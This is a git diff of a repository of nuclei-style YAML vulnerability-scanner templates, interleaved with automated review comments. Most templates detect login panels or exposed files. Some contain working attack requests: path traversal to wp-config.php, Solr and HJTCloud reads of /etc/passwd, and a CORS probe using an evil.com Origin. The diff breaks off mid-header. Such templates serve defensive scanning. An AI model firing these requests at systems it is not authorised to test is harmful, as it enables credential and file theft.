detect,tech,adiscon-loganalyzer + severity: info + metadata: + product: loganalyzer + vendor: adiscon + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - adiscon gmbh + case-insensitive: true diff --git a/poc/other/adminer-panel-75.yaml b/poc/other/adminer-panel-75.yaml index 31a391dd47..b2cf28a10c 100644 --- a/poc/other/adminer-panel-75.yaml +++ b/poc/other/adminer-panel-75.yaml 
@@ -1,22 +1,27 @@ id: adminer-panel + info: - name: Adminer Login panel + name: Adminer Login Panel author: random_robbie,meme-lord + description: An Adminer login panel was detected. severity: info - reference: https://blog.sorcery.ie/posts/adminer/ - tags: panel,adminer,login - - # <= 4.2.4 can have unauthenticated RCE via SQLite driver - # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL - # Most versions have some kind of SSRF usability - # Is generally handy if you find SQL creds + reference: + - https://blog.sorcery.ie/posts/adminer/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + metadata: + shodan-query: title:"Login - Adminer" + tags: panel,adminer requests: - method: GET path: + - '{{BaseURL}}/adminer.php' - '{{BaseURL}}/_adminer.php' - '{{BaseURL}}/adminer/' - - '{{BaseURL}}/adminer.php' - '{{BaseURL}}/editor.php' - '{{BaseURL}}/mysql.php' - '{{BaseURL}}/sql.php' @@ -28,7 +33,6 @@ requests: stop-at-first-match: true matchers-condition: and matchers: - - type: word words: - "Login - Adminer" @@ -43,3 +47,5 @@ requests: group: 1 regex: - '([0-9.]+)' + +# Enhanced by mp on 2022/03/20 diff --git a/poc/other/ampps-admin-panel-305.yaml b/poc/other/ampps-admin-panel-305.yaml index 3dc153d361..1ced15ef7b 100644 --- a/poc/other/ampps-admin-panel-305.yaml +++ b/poc/other/ampps-admin-panel-305.yaml @@ -4,6 +4,9 @@ info: name: AMPPS Admin Login Panel author: deFr0ggy severity: info + description: An AMPPS Admin login panel was detected. + classification: + cwe-id: CWE-200 tags: panel,ampps,login requests: @@ -33,3 +36,5 @@ requests: group: 1 regex: - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' + +# Enhanced by mp on 2022/03/16 diff --git a/poc/other/ansible-semaphore-panel-328.yaml b/poc/other/ansible-semaphore-panel-328.yaml index 0aa276d1d5..9c7790ff1d 100644 --- a/poc/other/ansible-semaphore-panel-328.yaml +++ b/poc/other/ansible-semaphore-panel-328.yaml 
@@ -1,26 +1,32 @@ id: ansible-semaphore-panel info: - name: Ansible Semaphore Panel + name: Ansible Semaphore Panel Detect author: Yuzhe-zhang-0 severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Ansible+Semaphore%22 - tags: panel,ansible,semaphore,cicd + description: An Ansible Semaphore login panel was detected. + reference: + - https://ansible-semaphore.com/ + - https://github.com/ansible-semaphore/semaphore + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.html:"Semaphore" + tags: panel,ansible,semaphore,cicd,oss requests: - method: GET - redirects: true - max-redirects: 5 path: - - '{{BaseURL}}/' + - '{{BaseURL}}/auth/login' - matchers-condition: and + matchers-condition: or matchers: - type: word words: - - 'Ansible Semaphore' - - '>Semaphore' + - 'Ansible Semaphore' - - type: status - status: - - 200 \ No newline at end of file + - type: regex + regex: + - 'Semaphore' + +# Enhanced by mp on 2022/03/23 diff --git a/poc/other/antsword-backdoor.yaml b/poc/other/antsword-backdoor.yaml index 5cf33c9815..160e514e1b 100644 --- a/poc/other/antsword-backdoor.yaml +++ b/poc/other/antsword-backdoor.yaml @@ -1,16 +1,10 @@ id: antsword-backdoor info: - name: AntSword Backdoor Detection + name: Antsword backdook author: ffffffff0x severity: critical - description: An AntSword application backdoor shell was discovered. - reference: - - https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-553 - remediation: Reinstall AnstSword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms. + description: 蚁剑「绕过 disable_functions」插件生成的 shell + reference: https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 tags: backdoor,antsword requests: - method: POST 
@@ -28,5 +22,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/04/22 diff --git a/poc/other/apc-info.yaml b/poc/other/apc-info.yaml index cd1534ba4c..0fc35742be 100644 --- a/poc/other/apc-info.yaml +++ b/poc/other/apc-info.yaml @@ -4,12 +4,15 @@ info: name: APCu service information leakage author: koti2 severity: low + tags: config,service,apcu requests: - method: GET path: - "{{BaseURL}}/apc/apc.php" - "{{BaseURL}}/apc.php" + + stop-at-first-match: true matchers: - type: word words: diff --git a/poc/other/artifactory_deploy.yaml b/poc/other/artifactory_deploy.yaml index 23f2c562b3..d49def2967 100644 --- a/poc/other/artifactory_deploy.yaml +++ b/poc/other/artifactory_deploy.yaml @@ -1,26 +1,29 @@ id: artifactory-anonymous-deploy info: - name: Artifactory repos with anonymous deploy permissions (https://www.errno.fr/artifactory/Attacking_Artifactory.html) + name: Artifactory anonymous deploy + reference: https://www.errno.fr/artifactory/Attacking_Artifactory.html author: panch0r3d severity: high + tags: artifactory requests: - method: GET path: - "{{BaseURL}}/artifactory/ui/repodata?deploy=true" - headers: - User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" + matchers-condition: and matchers: - - type: regex - regex: - - '(repoList).*?["].*["]' - - '(repoTypesList).*?["].*["]' - part: body - extractors: - - type: regex + - type: word + words: + - '"repoKey"' part: body - regex: - - '(repoTypesList).*?["].*["]' - - '(repoList).*?["].*["]' + + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + part: header \ No newline at end of file diff --git a/poc/other/aspose-ie-file-download.yaml b/poc/other/aspose-ie-file-download.yaml index 18857d6187..009aa84bcd 100644 --- a/poc/other/aspose-ie-file-download.yaml +++ b/poc/other/aspose-ie-file-download.yaml 
@@ -1,20 +1,17 @@ id: aspose-ie-file-download - info: - name: WordPress Aspose Importer & Exporter 1.0 - Local File Inclusion + name: Wordpress Aspose Importer & Exporter v1.0 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: WordPress Aspose Importer & Exporter version 1.0 is vulnerable to local file inclusion. + description: The Aspose importer and Exporter WordPress plugin is affected by an arbitrary file retrieval vulnerability. reference: - https://packetstormsecurity.com/files/131162/ - https://wordpress.org/plugins/aspose-importer-exporter tags: wordpress,wp-plugin,lfi,aspose - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php' - matchers-condition: and matchers: - type: word @@ -23,9 +20,6 @@ requests: - "DB_PASSWORD" part: body condition: and - - type: status status: - 200 - -# Enhanced by mp on 2022/08/01 diff --git a/poc/other/aspose-words-file-download-572.yaml b/poc/other/aspose-words-file-download-572.yaml index a9187a88fa..ac80fecb8c 100644 --- a/poc/other/aspose-words-file-download-572.yaml +++ b/poc/other/aspose-words-file-download-572.yaml @@ -1,10 +1,10 @@ id: aspose-words-file-download info: - name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download + name: Aspose Words Exporter < 2.0 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose.Words Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + description: The Aspose.Words Exporter WordPress plugin is affected by an arbitrary file retrieval security vulnerability. reference: - https://wpscan.com/vulnerability/7869 - https://wordpress.org/plugins/aspose-doc-exporter diff --git a/poc/other/axis-happyaxis-669.yaml b/poc/other/axis-happyaxis-669.yaml index 2a7dfaa54e..07055894fd 100644 --- a/poc/other/axis-happyaxis-669.yaml +++ b/poc/other/axis-happyaxis-669.yaml 
@@ -4,11 +4,9 @@ info: name: Axis Happyaxis Exposure author: dogasantos severity: info - metadata: - max-request: 4 - tags: axis,axis2,middleware,exposure,apache,files + tags: axis,axis2,middleware,exposure,apache -http: +requests: - method: GET path: - "{{BaseURL}}/axis2/axis2-web/HappyAxis.jsp" @@ -17,7 +15,6 @@ http: - "{{BaseURL}}/happyaxis.jsp" stop-at-first-match: true - matchers-condition: and matchers: - type: word @@ -32,5 +29,3 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220160316ce43f156b0a664a3aece681f6f7a45bfbd84f441cf9c084c86cb8e8138022100e83b37d792dd27c2a9b5358bfbcae206b18c31b37510b106613df42c9105b177:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/barracuda-panel-684.yaml b/poc/other/barracuda-panel-684.yaml index 08f83130c0..280fef29c5 100644 --- a/poc/other/barracuda-panel-684.yaml +++ b/poc/other/barracuda-panel-684.yaml @@ -4,12 +4,10 @@ info: name: Barracuda SSL VPN Log In author: dhiyaneshDK severity: info - tags: barracuda,panel,vpn description: The Barracuda SSL VPN is an integrated hardware and software solution enabling secure, clientless remote access to internal network resources from any web browser. classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + tags: barracuda,panel,vpn requests: - method: GET diff --git a/poc/other/basic-cors.yaml b/poc/other/basic-cors.yaml index 1ebe0fd57d..a62918aec8 100644 --- a/poc/other/basic-cors.yaml +++ b/poc/other/basic-cors.yaml 
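Review bot: Removing the `# digest:` trailer in the last axis-happyaxis-669.yaml hunk leaves the template without the signature line a consumer can use to check that it was not altered after signing. The deprecated-tls-6957.yaml hunk later in this commit drops its digest the same way. The first axis hunk also goes from `http:` back to the older `requests:` key and deletes `max-request: 4`, while lazy-file-8607.yaml in this same commit moves in the opposite direction, so the automated sync appears to mix template generations. If the older copy is what is wanted, the commit message should say so; otherwise keep the `http:` form together with its `# digest:` line.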
@@ -1,18 +1,22 @@ -id: basic-cors-misconfig - -info: - name: Basic CORS misconfiguration - author: nadino - severity: medium - -requests: - - method: GET - path: - - "{{BaseURL}}" - headers: - Origin: "https://evil.com" - matchers: - - type: word - words: - - "Access-Control-Allow-Origin: https://evil.com" - part: header +id: basic-cors-misconfig + +info: + name: Basic CORS misconfiguration + author: nadino + severity: info + tags: cors + +requests: + - method: GET + path: + - "{{BaseURL}}" + headers: + Origin: https://evil.com + + matchers: + - type: word + words: + - "Access-Control-Allow-Origin: https://evil.com" + - "Access-Control-Allow-Credentials: true" + condition: and + part: header diff --git a/poc/other/cache-poisoning.yaml b/poc/other/cache-poisoning.yaml index 82886086dc..1703f38d93 100644 --- a/poc/other/cache-poisoning.yaml +++ b/poc/other/cache-poisoning.yaml @@ -2,26 +2,32 @@ id: cache-poisoning info: name: Cache Poisoning - author: melbadry9 & xelkomy - severity: info - reference: | - - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning - - https://portswigger.net/research/practical-web-cache-poisoning - tags: cache + author: melbadry9,xelkomy,akincibor,dogasantos + severity: low + reference: + - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning + - https://portswigger.net/research/practical-web-cache-poisoning + tags: cache,generic requests: - raw: - | - GET /?mel=9 HTTP/1.1 - X-Forwarded-Prefix: cache.example.com - X-Forwarded-Host: cache.example.com - X-Forwarded-For: cache.example.com + GET /?{{randstr}}=9 HTTP/1.1 + X-Forwarded-Prefix: prefix.cache.example.com + X-Forwarded-Host: host.cache.example.com + X-Forwarded-For: for.cache.example.com - | - GET /?mel=9 HTTP/1.1 + GET /?{{randstr}}=9 HTTP/1.1 req-condition: true matchers: - type: dsl dsl: - 'contains(body_2, "cache.example.com")' + + extractors: + - type: regex + part: response + regex: + - "(prefix|host|for).cache.example.com" 
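Review bot: In basic-cors.yaml, `severity: info` and the missing `description` undersell what the tightened matcher reports. With `condition: and`, a match now means the response both echoed the supplied `Origin` and set `Access-Control-Allow-Credentials: true`, which is the combination that matters for triage; the old side rated the weaker check `medium`. I would add `description: Response reflects an arbitrary Origin and allows credentials, so another origin can read authenticated responses.` and revisit the severity so the finding is not filtered out with informational noise.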
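Review bot: In cache-poisoning.yaml, the new extractor regex `"(prefix|host|for).cache.example.com"` leaves its dots unescaped, so each `.` matches any character. Single-quoting it as `'(prefix|host|for)\.cache\.example\.com'` keeps the marker literal without YAML escape problems. The template would also benefit from a comment above `req-condition: true`, such as `# request 2 sends no X-Forwarded-* headers; the marker in body_2 means the first response was cached`, because the matcher's reliance on `body_2` is not obvious to a reader.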
diff --git a/poc/other/campaignmonitor-843.yaml b/poc/other/campaignmonitor-843.yaml index bc88823e52..ce47b830ae 100644 --- a/poc/other/campaignmonitor-843.yaml +++ b/poc/other/campaignmonitor-843.yaml @@ -1,20 +1,29 @@ id: campaignmonitor-takeover info: - name: campaignmonitor takeover detection + name: CampaignMonitor Takeover Detection author: pdteam severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/275 + metadata: + max-request: 1 + tags: takeover,campaignmonitor -requests: +http: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - 'Trying to access your account?' - 'or " - - "" - - "domain uri=" - condition: and - - - type: status - status: +id: clientaccesspolicy + +info: + author: emadshanab + name: Silverlight cross-domain policy + severity: info + tags: misc + +requests: + - method: GET + path: + - "{{BaseURL}}/clientaccesspolicy.xml" + + matchers-condition: and + matchers: + - type: word + words: + - "" + - "" + - "domain uri=" + condition: and + + - type: status + status: - 200 \ No newline at end of file diff --git a/poc/other/cloudinary-1026.yaml b/poc/other/cloudinary-1026.yaml index 960dabd6e3..c7399bd374 100644 --- a/poc/other/cloudinary-1026.yaml +++ b/poc/other/cloudinary-1026.yaml @@ -1,16 +1,13 @@ id: cloudinary-basic-auth - info: name: Cloudinary Basic Auth author: gaurang severity: high tags: token,file - file: - extensions: - all - extractors: - type: regex regex: - - "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+" \ No newline at end of file + - "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+" diff --git a/poc/other/codeigniter-env.yaml b/poc/other/codeigniter-env.yaml index 17aa2df30c..02026c4c64 100644 --- a/poc/other/codeigniter-env.yaml +++ b/poc/other/codeigniter-env.yaml 
@@ -1,8 +1,9 @@ id: codeigniter-env info: - name: Codeigniter .env file + name: Codeigniter - .env File Discovery author: emenalf severity: high + description: Codeigniter .env file was discovered. tags: config,exposure,codeigniter requests: - method: GET @@ -29,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/07/15 diff --git a/poc/other/csod-panel-1288.yaml b/poc/other/csod-panel-1288.yaml index c3bb48b3aa..b1bbc95572 100644 --- a/poc/other/csod-panel-1288.yaml +++ b/poc/other/csod-panel-1288.yaml @@ -1,20 +1,20 @@ -id: csod-panel -info: - name: CornerStoneOnDemand Instance Detection Template - author: righettod - severity: info - description: Try to detect the presence of a CornerStoneOnDemand (CSOD www.cornerstoneondemand.com) instance via the login page - tags: panel,csod -requests: - - method: GET - path: - - "{{BaseURL}}" - redirects: true - max-redirects: 5 - matchers: - - type: word - words: - - "csod-custom" - - "csodcommon" - part: body - condition: or +id: csod-panel +info: + name: CornerStoneOnDemand Instance Detection Template + author: righettod + severity: info + description: Try to detect the presence of a CornerStoneOnDemand (CSOD www.cornerstoneondemand.com) instance via the login page + tags: panel,csod +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 5 + matchers: + - type: word + words: + - "csod-custom" + - "csodcommon" + part: body + condition: or diff --git a/poc/other/custom-solr-file-read.yaml b/poc/other/custom-solr-file-read.yaml index 70667d27fb..8af1e2bc32 100644 --- a/poc/other/custom-solr-file-read.yaml +++ b/poc/other/custom-solr-file-read.yaml 
@@ -1,37 +1,44 @@ -id: apache-solr-file-read -info: - name: Apache Solr <= 8.8.1 Arbitrary File Read - author: DhiyaneshDk - severity: high - reference: - - https://twitter.com/Al1ex4/status/1382981479727128580 - - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ - - https://twitter.com/sec715/status/1373472323538362371 - tags: apache,solr,lfi -requests: - - raw: - - | - GET /solr/admin/cores?wt=json HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Connection: close - - | - GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Connection: close - extractors: - - type: regex - internal: true - name: core - group: 1 - regex: - - '"name"\:"(.*?)"' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" +id: apache-solr-file-read + +info: + name: Apache Solr <= 8.8.1 Arbitrary File Read + author: DhiyaneshDk + severity: high + tags: apache,solr,lfi + reference: + - https://twitter.com/Al1ex4/status/1382981479727128580 + - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + - https://twitter.com/sec715/status/1373472323538362371 + +requests: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + - | + GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + + extractors: + - type: regex + internal: true + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - "root:.*:0:0:" \ No newline at end of file diff --git a/poc/other/d-link-wireless.yaml b/poc/other/d-link-wireless.yaml index 7ef91edf61..d896e4fb9c 100644 --- a/poc/other/d-link-wireless.yaml 
+++ b/poc/other/d-link-wireless.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6784 - tags: panel,dlink,router + tags: panel requests: - method: GET diff --git a/poc/other/deprecated-tls-6957.yaml b/poc/other/deprecated-tls-6957.yaml index 6304e53d9a..51a6f4e9b6 100644 --- a/poc/other/deprecated-tls-6957.yaml +++ b/poc/other/deprecated-tls-6957.yaml @@ -1,8 +1,7 @@ id: deprecated-tls - info: name: Deprecated TLS Detection (TLS 1.1 or SSLv3) - author: righettod,forgedhallpass + author: righettod severity: info reference: - https://ssl-config.mozilla.org/#config=intermediate @@ -11,35 +10,13 @@ info: remediation: | Update the web server's TLS configuration to disable TLS 1.1 and SSLv3. metadata: - max-request: 3 shodan-query: ssl.version:sslv2 ssl.version:sslv3 ssl.version:tlsv1 ssl.version:tlsv1.1 tags: ssl - ssl: - address: "{{Host}}:{{Port}}" - min_version: ssl30 - max_version: ssl30 - - extractors: - - type: json - json: - - " .tls_version" - - - address: "{{Host}}:{{Port}}" - min_version: tls10 - max_version: tls10 - - extractors: - - type: json - json: - - " .tls_version" - - - address: "{{Host}}:{{Port}}" - min_version: tls11 + min_version: sslv3 max_version: tls11 - extractors: - type: json json: - " .tls_version" -# digest: 490a0046304402202676887fb2bb19b250a3d7242fa4f8b227f1e7fcc213d0c25ef756dbb2b49b0102205ff811bcca37e12032ae5f53deb8d452b229b2fc3b165021a637a8de66f38641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/dir-listing-7009.yaml b/poc/other/dir-listing-7009.yaml index 3f886b9869..5192b48644 100644 --- a/poc/other/dir-listing-7009.yaml +++ b/poc/other/dir-listing-7009.yaml 
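Review bot: In deprecated-tls-6957.yaml, folding the three single-version probes into one entry with `min_version: sslv3` and `max_version: tls11` probably changes what the template reports. A ranged handshake presumably yields only the version the server negotiates, so a host that still accepts several deprecated versions would be listed once rather than once per version. The removed lines spelled the lowest version `ssl30` and the new line spells it `sslv3`; confirm that the engine version in use accepts that value, since an unrecognised one could disable the check without any visible error. If per-version reporting is still wanted, keep the separate `address` entries, each with the same `min_version` and `max_version`.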
@@ -3,7 +3,8 @@ info: name: Directory listing enabled author: _harleo,pentest_swissky severity: info - reference: https://portswigger.net/kb/issues/00600100_directory-listing + reference: + - https://portswigger.net/kb/issues/00600100_directory-listing tags: misc,generic requests: - method: GET @@ -16,3 +17,4 @@ requests: - "Index of /" - "[To Parent Directory]" - "Directory: /" + condition: or diff --git a/poc/other/domcfg-page-7075.yaml b/poc/other/domcfg-page-7075.yaml index 1d9bad7a50..7de3df05fe 100644 --- a/poc/other/domcfg-page-7075.yaml +++ b/poc/other/domcfg-page-7075.yaml @@ -4,13 +4,11 @@ info: author: gevakun severity: low reference: https://twitter.com/Wh11teW0lf/status/1295594085445709824 - tags: exposure - + tags: exposure,lotus requests: - method: GET path: - "{{BaseURL}}/domcfg.nsf" - matchers-condition: and matchers: - type: word @@ -19,7 +17,6 @@ requests: - Mapping - Mappings condition: and - - type: status status: - 200 diff --git a/poc/other/easy-media-gallery-pro-listing.yaml b/poc/other/easy-media-gallery-pro-listing.yaml index e3b005d465..4472ac4d94 100644 --- a/poc/other/easy-media-gallery-pro-listing.yaml +++ b/poc/other/easy-media-gallery-pro-listing.yaml 
@@ -1,24 +1,24 @@ -id: easy-media-gallery-pro-listing -info: - name: WordPress Plugin Media Gallery Pro Listing - author: pussycat0x - severity: info - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6455 - tags: wordpress,listing,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/easy-media-gallery-pro/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "wp-content/plugins/easy-media-gallery-pro/" - condition: and - - type: status - status: - - 200 +id: easy-media-gallery-pro-listing +info: + name: WordPress Plugin Media Gallery Pro Listing + author: pussycat0x + severity: info + description: Searches for sensitive directories present in the wordpress-plugins plugin. + reference: https://www.exploit-db.com/ghdb/6455 + tags: wordpress,listing,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/easy-media-gallery-pro/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "wp-content/plugins/easy-media-gallery-pro/" + condition: and + - type: status + status: + - 200 diff --git a/poc/other/fatpipe-ipvpn-panel-7436.yaml b/poc/other/fatpipe-ipvpn-panel-7436.yaml index 80aafdc1c8..e66d5b095c 100644 --- a/poc/other/fatpipe-ipvpn-panel-7436.yaml +++ b/poc/other/fatpipe-ipvpn-panel-7436.yaml @@ -4,7 +4,8 @@ info: name: FatPipe IPVPN® Panel Detect author: dwisiswant0 severity: info - reference: https://www.fatpipeinc.com/products/index.php + reference: + - https://www.fatpipeinc.com/products/index.php tags: panel,ipvpn,fatpipe requests: diff --git a/poc/other/filezilla.yaml b/poc/other/filezilla.yaml index fdfeca477f..433093831e 100644 --- a/poc/other/filezilla.yaml +++ b/poc/other/filezilla.yaml @@ -1,4 +1,5 @@ id: filezilla-exposed + info: name: Filezilla author: amsda 
@@ -9,6 +10,7 @@ requests: - "{{BaseURL}}/filezilla.xml" - "{{BaseURL}}/sitemanager.xml" - "{{BaseURL}}/FileZilla.xml" + matchers-condition: and matchers: - type: word @@ -16,10 +18,12 @@ requests: - "" condition: and + - type: word words: - xml part: header + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/other/firebase-urls.yaml b/poc/other/firebase-urls.yaml index 18f0ab9edd..67a05cefcb 100644 --- a/poc/other/firebase-urls.yaml +++ b/poc/other/firebase-urls.yaml @@ -20,4 +20,4 @@ requests: - type: regex regex: - ".*?(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?" - part: body + part: body \ No newline at end of file diff --git a/poc/other/hjtcloud-arbitrary-file-read.yaml b/poc/other/hjtcloud-arbitrary-file-read.yaml index 89620cd0e4..a4301b8ce5 100644 --- a/poc/other/hjtcloud-arbitrary-file-read.yaml +++ b/poc/other/hjtcloud-arbitrary-file-read.yaml @@ -13,9 +13,7 @@ requests: POST /fileDownload?action=downloadBackupFile HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 20 fullPath=/etc/passwd @@ -23,9 +21,7 @@ requests: POST /fileDownload?action=downloadBackupFile HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 20 fullPath=/Windows/win.ini diff --git a/poc/other/home-assistant-7981.yaml b/poc/other/home-assistant-7981.yaml index 0522fc067b..dfb82e44b7 100644 --- a/poc/other/home-assistant-7981.yaml +++ b/poc/other/home-assistant-7981.yaml 
@@ -4,6 +4,7 @@ info: name: Detect Home Assistant author: fabaff severity: info + tags: tech,iot requests: - method: GET diff --git a/poc/other/hp-service-manager-8032.yaml b/poc/other/hp-service-manager-8032.yaml index d4450e4ee9..8751e2e49a 100644 --- a/poc/other/hp-service-manager-8032.yaml +++ b/poc/other/hp-service-manager-8032.yaml @@ -1,19 +1,16 @@ id: hp-service-manager - info: name: HP Service Manager author: dhiyaneshDK severity: info - metadata: - shodan-query: http.title:"HP Service Manager" + reference: + - https://www.shodan.io/search?query=http.title%3A%22HP+Service+Manager%22 tags: panel,hp,service - requests: - method: GET path: - '{{BaseURL}}/sm935/index.do' - '{{BaseURL}}/sm/ess.do' - matchers-condition: and matchers: - type: regex diff --git a/poc/other/huawei-hg532e-panel.yaml b/poc/other/huawei-hg532e-panel.yaml index 09871c83a9..8f1cc09e5e 100644 --- a/poc/other/huawei-hg532e-panel.yaml +++ b/poc/other/huawei-hg532e-panel.yaml @@ -1,30 +1,25 @@ id: huawei-hg532e-panel - info: name: Huawei HG532e Detection author: idealphase severity: info description: The Huawei HG532e router. By default, both the username and password is user + metadata: + shodan-query: http.html:"HG532e" reference: - https://setuprouter.com/router/huawei/hg532e/1194.pdf - https://www.192-168-1-1-ip.co/router/huawei/hg532e/2186/ - metadata: - shodan-query: http.html:"HG532e" tags: huawei,panel - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - - type: word part: body words: - "HG532e" - - type: status status: - 200 diff --git a/poc/other/internet-service.yaml b/poc/other/internet-service.yaml index 25a97192ed..d058c13c85 100644 --- a/poc/other/internet-service.yaml +++ b/poc/other/internet-service.yaml 
@@ -1,17 +1,15 @@ id: internet-service - info: name: Internet Services author: dhiyaneshDK severity: low - reference: https://www.exploit-db.com/ghdb/5948 + reference: + - https://www.exploit-db.com/ghdb/5948 tags: iot - requests: - method: GET path: - '{{BaseURL}}/default.htm' - matchers-condition: and matchers: - type: word diff --git a/poc/other/ioncube-loader-wizard.yaml b/poc/other/ioncube-loader-wizard.yaml index 399454a616..e5f2981ba0 100644 --- a/poc/other/ioncube-loader-wizard.yaml +++ b/poc/other/ioncube-loader-wizard.yaml @@ -1,15 +1,10 @@ id: ioncube-loader-wizard info: - name: ioncube Loader Wizard Disclosure + name: Ioncube Loader Wizard disclosure author: Mubassirpatel severity: medium - description: An ioncube Loader Wizard was discovered. - reference: - - https://firefart.at/post/multiple-vulnerabilities-in-ioncube-loader-wizard/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 + description: ioncube-loader-wizard is vulnerable to xss,phpinfo, etc. + reference: https://firefart.at/post/multiple-vulnerabilities-in-ioncube-loader-wizard/ tags: ioncube,disclosure,exposure requests: - method: GET @@ -25,5 +20,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/04/08 diff --git a/poc/other/itop-panel.yaml b/poc/other/itop-panel.yaml index 66bf2e2b5a..367b274f54 100644 --- a/poc/other/itop-panel.yaml +++ b/poc/other/itop-panel.yaml @@ -1,15 +1,18 @@ id: itop-panel + info: name: iTop Instance Detection Template author: righettod severity: info description: Try to detect the presence of a Combodo iTop instance via the login page tags: panel,itop + requests: - method: GET path: - "{{BaseURL}}/pages/UI.php" - "{{BaseURL}}/simple/pages/UI.php" + matchers-condition: and matchers: - type: word @@ -18,6 +21,7 @@ requests: - "iTop login" part: body condition: or + - type: status status: - - 200 + - 200 \ No newline at end of file 
diff --git a/poc/other/jenk.yaml b/poc/other/jenk.yaml index 1ce87d12b2..62a1aba442 100644 --- a/poc/other/jenk.yaml +++ b/poc/other/jenk.yaml @@ -53,4 +53,4 @@ javascript: group: 1 regex: - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' -# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/jkstatus-manager.yaml b/poc/other/jkstatus-manager.yaml index 8b01538324..06deaae295 100644 --- a/poc/other/jkstatus-manager.yaml +++ b/poc/other/jkstatus-manager.yaml @@ -2,9 +2,8 @@ id: jkstatus-manager info: name: JK Status Manager - author: pdteam + author: bauthard severity: low - tags: config requests: - method: GET diff --git a/poc/other/jmx-console-8351.yaml b/poc/other/jmx-console-8351.yaml index 